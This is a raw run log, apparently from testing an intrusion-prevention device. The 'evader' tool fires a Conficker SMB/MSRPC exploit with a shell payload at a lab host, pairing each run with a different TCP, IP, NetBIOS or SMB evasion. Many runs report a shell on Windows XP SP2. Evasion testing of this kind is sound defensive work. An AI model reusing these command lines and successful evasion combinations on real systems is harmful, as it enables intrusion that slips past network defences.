- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55909 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=tnVOfG/VLwU --evasion=[smb_connect,msrpc_req]smb_decoytrees,"3","2","973","random_msrpcreq" --evasion=[smb_openpipe,end]tcp_urgent,"5","random" --verifydelay=1000 --payload=shell
- Info: Using random seed tnVOfG/VLwW
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Before normal SMB writes, 3 SMB trees are opened and 2 writes are performed to them. The write payload is 973 bytes of MSRPC request-like data.
- The following evasions are applied from stage smb_openpipe to end:
- - Add a random urgent data byte to every 5 TCP segment.
- Info: NetBIOS connection 10.62.90.111:55909 -> 10.35.1.207:445
- Terminated
- ...............
- 27713 runs averaging 1.77 runs / second ; progress: 15695/43200..........
- 27723 runs averaging 1.77 runs / second ; progress: 15700/43200.............
- 27736 runs averaging 1.77 runs / second ; progress: 15705/43200......Pid 1391 timed out - killed
- 2015-11-29 18:47:38 INFO
- Timed out (10.62.90.110):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29321 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=AzPJyM0KsdE --evasion=[smb_opentree,msrpc_bind]netbios_chaff,"5","empty_keepalive|small_unspec|http_get|msrpc_req" --evasion=[smb_connect,end]tcp_urgent,"25%","random_alpha" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed AzPJyM0KsdE
- The following evasions are applied from stage smb_connect to end:
- - 25% probability to add a random alphaurgent data byte to a TCP segment.
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Add a zero urgent data byte to every 2 TCP segment.
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Before every 5th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
- Info: NetBIOS connection 10.62.90.110:29321 -> 10.35.1.207:445
- Terminated
- ..........
- 27753 runs averaging 1.77 runs / second ; progress: 15710/43200.............
- 27766 runs averaging 1.77 runs / second ; progress: 15715/43200...Pid 1432 timed out - killed
- 2015-11-29 18:47:49 INFO
- Timed out (10.62.90.113):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=12055 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=xV8Qwg+e8qU --evasion=[smb_openpipe,msrpc_bind]netbios_chaff,"13","small_unspec|http_post" --evasion=[smb_openpipe,end]tcp_paws,"75%","1","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed xV8Qwg+e8qX
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 1> and has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - Before every 13th actual NetBIOS message a chaff message is sent. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload.
- Info: NetBIOS connection 10.62.90.113:12055 -> 10.35.1.207:445
- Terminated
- .
- 27771 runs averaging 1.77 runs / second ; progress: 15720/43200.
- 27772 runs averaging 1.77 runs / second ; progress: 15725/43200....2015-11-29 18:47:59 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51361 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=9FEgSgu5vcw --evasion=[smb_openpipe,msrpc_req]smb_decoytrees,"2","2","3","random" --evasion=[smb_opentree,end]tcp_paws,"5","8","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed 9FEgSgu5vcz
- The following evasions are applied from stage smb_opentree to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Before normal SMB writes, 2 SMB trees are opened and 2 writes are performed to them. The write payload is 3 random bytes.
- Info: NetBIOS connection 10.62.90.117:51361 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .....
- 27782 runs averaging 1.77 runs / second ; progress: 15730/43200....................
- 27802 runs averaging 1.77 runs / second ; progress: 15735/43200...................2015-11-29 18:48:09 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58603 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=zQrV9wU4W2Q --evasion=[smb_connect,end]smb_decoytrees,"2","6","2","random_msrpcreq" --evasion=[smb_openpipe,end]tcp_overlap,"774","new","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed zQrV9wU4W2T
- The following evasions are applied from stage smb_connect to end:
- - Before normal SMB writes, 2 SMB trees are opened and 6 writes are performed to them. The write payload is 2 bytes of MSRPC request-like data.
- The following evasions are applied from stage smb_openpipe to end:
- - TCP segments are set to overlap by 774 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.111:58603 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 27825 runs averaging 1.77 runs / second ; progress: 15740/43200.2015-11-29 18:48:11 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58902 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=GGyhVeoye7M --evasion=[smb_connect,msrpc_bind]tcp_chaff,"3","chksum|nullflag|outofwindow|shorthdr|longhdr","zero" --evasion=[start,end]tcp_paws,"3","36687720","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed GGyhVeoye7M
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 36687720> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - With every 3 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * Invalid TCP checksum.
- * NULL TCP control flags.
- * An out-of-window sequence number.
- * TCP header shorter than 20 bytes
- * TCP header longer than packet total size
- * Duplicate packet has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.113:58902 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .........
- 27836 runs averaging 1.77 runs / second ; progress: 15745/43200......
- 27842 runs averaging 1.77 runs / second ; progress: 15750/43200.2015-11-29 18:48:22 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62003 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=6hxXZxV/TQc --evasion=[netbios_connect,smb_opentree]tcp_chaff,"21","outofwindow|longhdr","shuffle" --evasion=[start,msrpc_req]tcp_paws,"50%","257032956","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed 6hxXZxV/TQf
- The following evasions are applied from stage start to msrpc_req:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 257032956> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - With every 21 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * An out-of-window sequence number.
- * TCP header longer than packet total size
- * Duplicate packet has shuffled original payload
- Info: NetBIOS connection 10.62.90.110:62003 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ..........
- 27854 runs averaging 1.77 runs / second ; progress: 15755/43200..........
- 27864 runs averaging 1.77 runs / second ; progress: 15760/43200.........
- 27873 runs averaging 1.77 runs / second ; progress: 15765/43200......2015-11-29 18:48:39 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17936 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=4nL4a4IvLH0 --evasion=[netbios_connect,msrpc_req]tcp_paws,"1","3","random_alphanum" --evasion=[smb_connect,smb_openpipe]tcp_seg,"9" --verifydelay=1000 --payload=shell
- Info: Using random seed 4nL4a4IvLH3
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - TCP packets are segmented to contain at most 9 bytes of payload.
- Info: NetBIOS connection 10.62.90.113:17936 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ....
- 27884 runs averaging 1.77 runs / second ; progress: 15770/43200.............
- 27897 runs averaging 1.77 runs / second ; progress: 15775/43200...................
- 27916 runs averaging 1.77 runs / second ; progress: 15780/43200......2015-11-29 18:48:54 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=10147 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=QPbox6bWoBI --evasion=[smb_connect,end]tcp_overlap,"1479","new","random" --evasion=[netbios_connect,end]tcp_paws,"25%","215976190","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed QPbox6bWoBJ
- The following evasions are applied from stage netbios_connect to end:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 215976190> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_connect to end:
- - TCP segments are set to overlap by 1479 bytes, with the later packet containing the correct payload. Overlapping part has random bytes as payload
- Info: NetBIOS connection 10.62.90.117:10147 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ..
- 27925 runs averaging 1.77 runs / second ; progress: 15785/43200....2015-11-29 18:48:58 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52189 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=4Fl3WpOMNK8 --evasion=[start,msrpc_req]tcp_paws,"75%","6","alphanumrandomized" --evasion=[msrpc_req,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed 4Fl3WpOMNK/
- The following evasions are applied from stage start to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage msrpc_req to end:
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.117:52189 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .....2015-11-29 18:49:00 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56280 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=JDm6ToN1zLk --evasion=[smb_connect,end]tcp_paws,"1","3","alphanumrandomized" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"50%","117704364","shuffle" --evasion=[netbios_connect,end]tcp_recv_window,"7" --verifydelay=1000 --payload=shell
- Info: Using random seed JDm6ToN1zLk
- The following evasions are applied from stage netbios_connect to end:
- - TCP receive window is set to at most 7 bytes.
- The following evasions are applied from stage smb_connect to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 117704364> and has shuffled original payload
- Info: NetBIOS connection 10.62.90.117:56280 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 27938 runs averaging 1.77 runs / second ; progress: 15790/43200................
- 27954 runs averaging 1.77 runs / second ; progress: 15796/43200..........
- 27964 runs averaging 1.77 runs / second ; progress: 15801/43200..
- 27966 runs averaging 1.77 runs / second ; progress: 15806/43200
- 27966 runs averaging 1.77 runs / second ; progress: 15811/43200........
- 27974 runs averaging 1.77 runs / second ; progress: 15816/43200......2015-11-29 18:49:31 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34127 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=EwCILbJtpug --evasion=[start,smb_openpipe]ipv4_opt,"13","inc","random_alphanum" --evasion=[smb_opentree,end]tcp_paws,"50%","101597375","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed EwCILbJtpug
- The following evasions are applied from stage start to smb_openpipe:
- - Every 13th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_opentree to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 101597375> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.112:34127 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- 27981 runs averaging 1.77 runs / second ; progress: 15821/43200..
- 27983 runs averaging 1.77 runs / second ; progress: 15826/43200...
- 27986 runs averaging 1.77 runs / second ; progress: 15831/43200.......
- 27993 runs averaging 1.77 runs / second ; progress: 15836/43200.............2015-11-29 18:49:51 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56329 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=xqffTOxhPHs --evasion=[smb_opentree,smb_openpipe]tcp_chaff,"21","chksum|nullchksum|outofwindow","shuffle30" --evasion=[smb_opentree,end]tcp_paws,"3","268435455","random" --verifydelay=1000 --payload=shell
- Info: Using random seed xqffTOxhPHv
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - With every 21 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * Invalid TCP checksum.
- * NULL TCP checksum.
- * An out-of-window sequence number.
- * Duplicate packet has 30 bytes of original payload, then shuffled original payload
- The following evasions are applied from stage smb_opentree to end:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.110:56329 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .
- 28008 runs averaging 1.77 runs / second ; progress: 15841/43200...2015-11-29 18:49:52 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18237 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=6JjWlAliJfs --evasion=[netbios_connect,smb_connect]netbios_chaff,"50%","http_post" --evasion=[msrpc_bind,end]tcp_paws,"1","268435453","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed 6JjWlAliJfv
- The following evasions are applied from stage netbios_connect to smb_connect:
- - 50% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload.
- The following evasions are applied from stage msrpc_bind to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has original payload with alphabetic bytes randomized
- Info: NetBIOS connection 10.62.90.110:18237 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .....2015-11-29 18:49:54 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49837 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=QkN3JKTYqig --evasion=[start,msrpc_req]tcp_paws,"2","3","alphanumrandomized" --evasion=[netbios_connect,smb_opentree]tcp_paws,"1","9","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed QkN3JKTYqih
- The following evasions are applied from stage start to msrpc_req:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.117:49837 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .......
- 28025 runs averaging 1.77 runs / second ; progress: 15846/43200.............
- 28038 runs averaging 1.77 runs / second ; progress: 15851/43200...........
- 28049 runs averaging 1.77 runs / second ; progress: 15856/43200..........
- 28059 runs averaging 1.77 runs / second ; progress: 15861/43200.........
- 28068 runs averaging 1.77 runs / second ; progress: 15866/43200..
- 28070 runs averaging 1.77 runs / second ; progress: 15871/43200
- 28070 runs averaging 1.77 runs / second ; progress: 15876/43200Pid 5217 timed out - killed
- 2015-11-29 18:50:28 INFO
- Timed out (10.62.90.115):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=19081 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=iIUPNOtp5Ls --evasion=[smb_connect,end]tcp_chaff,"13","longhdr","random" --evasion=[smb_openpipe,end]tcp_urgent,"1","random" --verifydelay=1000 --payload=shell
- Info: Using random seed iIUPNOtp5Lu
- The following evasions are applied from stage smb_connect to end:
- - With every 13 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * TCP header longer than packet total size
- * Duplicate packet has random bytes as payload
- The following evasions are applied from stage smb_openpipe to end:
- - Add a random urgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.115:19081 -> 10.35.1.207:445
- Terminated
- 28071 runs averaging 1.77 runs / second ; progress: 15881/43200.....
- 28076 runs averaging 1.77 runs / second ; progress: 15886/43200.....
- 28081 runs averaging 1.77 runs / second ; progress: 15891/43200......2015-11-29 18:50:45 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=50648 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=f19n/w1BjR8 --evasion=[smb_openpipe,msrpc_bind]smb_decoytrees,"4","5","2047","random" --evasion=[msrpc_bind,end]tcp_paws,"1","33510158","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed f19n/w1BjR9
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - Before normal SMB writes, 4 SMB trees are opened and 5 writes are performed to them. The write payload is 2047 random bytes.
- The following evasions are applied from stage msrpc_bind to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 33510158> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.110:50648 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 28090 runs averaging 1.77 runs / second ; progress: 15896/432002015-11-29 18:50:51 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26041 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=sl7m0GwAntw --evasion=[smb_connect,msrpc_bind]ipv4_opt,"5","inc","random_alphanum" --evasion=[smb_connect,msrpc_req]smb_decoytrees,"6","2","7","random_msrpcreq" --evasion=[smb_openpipe,msrpc_req]smb_decoytrees,"6","5","4","random" --verifydelay=1000 --payload=shell
- Info: Using random seed sl7m0GwAnty
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - Every 5th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Before normal SMB writes, 6 SMB trees are opened and 2 writes are performed to them. The write payload is 7 bytes of MSRPC request-like data.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Before normal SMB writes, 6 SMB trees are opened and 5 writes are performed to them. The write payload is 4 random bytes.
- Info: NetBIOS connection 10.62.90.110:26041 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- 28091 runs averaging 1.77 runs / second ; progress: 15901/43200.....
- 28096 runs averaging 1.77 runs / second ; progress: 15906/43200.......
- 28103 runs averaging 1.77 runs / second ; progress: 15911/43200........
- 28111 runs averaging 1.77 runs / second ; progress: 15916/43200
- 28111 runs averaging 1.77 runs / second ; progress: 15921/43200
- 28111 runs averaging 1.77 runs / second ; progress: 15926/43200...
- 28114 runs averaging 1.76 runs / second ; progress: 15931/43200....
- 28118 runs averaging 1.76 runs / second ; progress: 15936/43200...2015-11-29 18:51:31 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63136 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=HrVWX3wtaqA --evasion=[smb_connect,smb_opentree]smb_chaff,"2","write_flag","msrpc" --evasion=[smb_opentree,msrpc_req]tcp_paws,"50%","170135684","random" --evasion=[msrpc_bind,msrpc_req]tcp_urgent,"3","random" --verifydelay=1000 --payload=shell
- Info: Using random seed HrVWX3wtaqA
- The following evasions are applied from stage smb_connect to smb_opentree:
- - Before every 2th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 170135684> and has random bytes as payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Add a random urgent data byte to every 3 TCP segment.
- Info: NetBIOS connection 10.62.90.110:63136 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .
- 28123 runs averaging 1.76 runs / second ; progress: 15941/43200......
- 28129 runs averaging 1.76 runs / second ; progress: 15946/43200.Pid 6900 timed out - killed
- 2015-11-29 18:51:38 INFO
- Timed out (10.62.90.118):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51735 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=yAsyNYuc8v4 --evasion=[msrpc_bind,msrpc_req]smb_chaff,"2","write_flag","alphanum" --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"5","5","562","random_alphanum" --evasion=[smb_connect,end]tcp_urgent,"25%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed yAsyNYuc8v7
- The following evasions are applied from stage smb_connect to end:
- - 25% probability to add a random alphaurgent data byte to a TCP segment.
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Before normal SMB writes, 5 SMB trees are opened and 5 writes are performed to them. The write payload is 562 random alphanumeric bytes.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Before every 2th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random alphanumeric payload
- Info: NetBIOS connection 10.62.90.118:51735 -> 10.35.1.207:445
- Terminated
- ......
- 28137 runs averaging 1.76 runs / second ; progress: 15951/43200Pid 6977 timed out - killed
- 2015-11-29 18:51:44 INFO
- Timed out (10.62.90.114):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=47476 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=isRm9W2VVvw --evasion=[start,netbios_connect]tcp_paws,"1","2","alpharandomized" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
- Info: Using random seed isRm9W2VVvy
- The following evasions are applied from stage start to netbios_connect:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 2> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to add a random urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.114:47476 -> 10.35.1.207:445
- Terminated
- ....
- 28142 runs averaging 1.76 runs / second ; progress: 15956/43200
- 28142 runs averaging 1.76 runs / second ; progress: 15961/43200Pid 7270 timed out - killed
- 2015-11-29 18:51:53 INFO
- Timed out (10.62.90.119):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58090 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=Hgg7DheMpXo --evasion=[smb_opentree,msrpc_req]tcp_chaff,"2","chksum|nullchksum|nullflag","alphanumrandomized" --evasion=[smb_openpipe,end]tcp_chaff,"3","chksum|nullchksum|nullflag|outofwindow|shorthdr","random_alphanum" --evasion=[smb_openpipe,end]tcp_urgent,"50%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed Hgg7DheMpXo
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - With every 2 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * Invalid TCP checksum.
- * NULL TCP checksum.
- * NULL TCP control flags.
- * Duplicate packet has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_openpipe to end:
- - With every 3 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * Invalid TCP checksum.
- * NULL TCP checksum.
- * NULL TCP control flags.
- * An out-of-window sequence number.
- * TCP header shorter than 20 bytes
- * Duplicate packet has random alphanumeric bytes as payload
- - 50% probability to add a zero urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.119:58090 -> 10.35.1.207:445
- Terminated
- Pid 7300 timed out - killed
- 2015-11-29 18:51:54 INFO
